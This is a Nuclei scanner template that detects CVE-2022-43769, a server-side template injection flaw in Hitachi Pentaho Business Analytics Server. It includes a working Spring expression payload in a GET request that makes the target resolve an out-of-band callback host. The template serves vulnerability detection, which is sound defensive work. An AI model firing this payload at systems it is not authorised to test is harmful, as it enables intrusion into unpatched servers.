nuclei-templates/cves/2022/CVE-2022-43769.yaml

46 lines
1.8 KiB
YAML

id: CVE-2022-43769
info:
name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
author: dwbzn
severity: high
description: |
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
reference:
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
- https://nvd.nist.gov/vuln/detail/CVE-2022-43769
remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-43769
cwe-id: CWE-94
metadata:
shodan-query: http.favicon.hash:1749354953
verified: "true"
tags: cve,cve2022,rce,ssti,pentaho,kev
requests:
- method: GET
path:
- "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- "false"
- type: word
part: header
words:
- "application/json"
# Enhanced by md on 2023/04/13